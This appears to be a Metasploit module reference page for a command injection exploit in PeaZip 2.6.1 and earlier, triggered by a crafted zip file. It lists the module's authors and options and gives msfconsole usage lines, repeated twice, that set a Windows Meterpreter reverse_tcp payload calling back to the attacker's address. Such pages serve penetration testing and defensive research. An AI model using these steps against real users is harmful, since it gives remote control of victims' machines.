PeaZip <= 2.6.1 Zip Processing Command Injection
This module exploits a command injection vulnerability in PeaZip. All versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with version 2.6.1 on Windows. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with PeaZip, and access the specially file via double-clicking it. By doing so, an attacker can execute arbitrary commands as the victim user.
Exploit Rank
- Excellent
Exploit Authors
- Nine:Situations:Group::pyrokinesis < >
- jduck < jduck [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Automatic (default)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/fileformat/peazip_command_injection
msf exploit(peazip_command_injection) > show payloads
msf exploit(peazip_command_injection) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(peazip_command_injection) > set LHOST [MY IP ADDRESS]
msf exploit(peazip_command_injection) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/fileformat/peazip_command_injection
msf exploit(peazip_command_injection) > show payloads
msf exploit(peazip_command_injection) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(peazip_command_injection) > set LHOST [MY IP ADDRESS]
msf exploit(peazip_command_injection) > exploit
Exploit Module Options
| FILENAME | The file name. (default: msf.zip) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |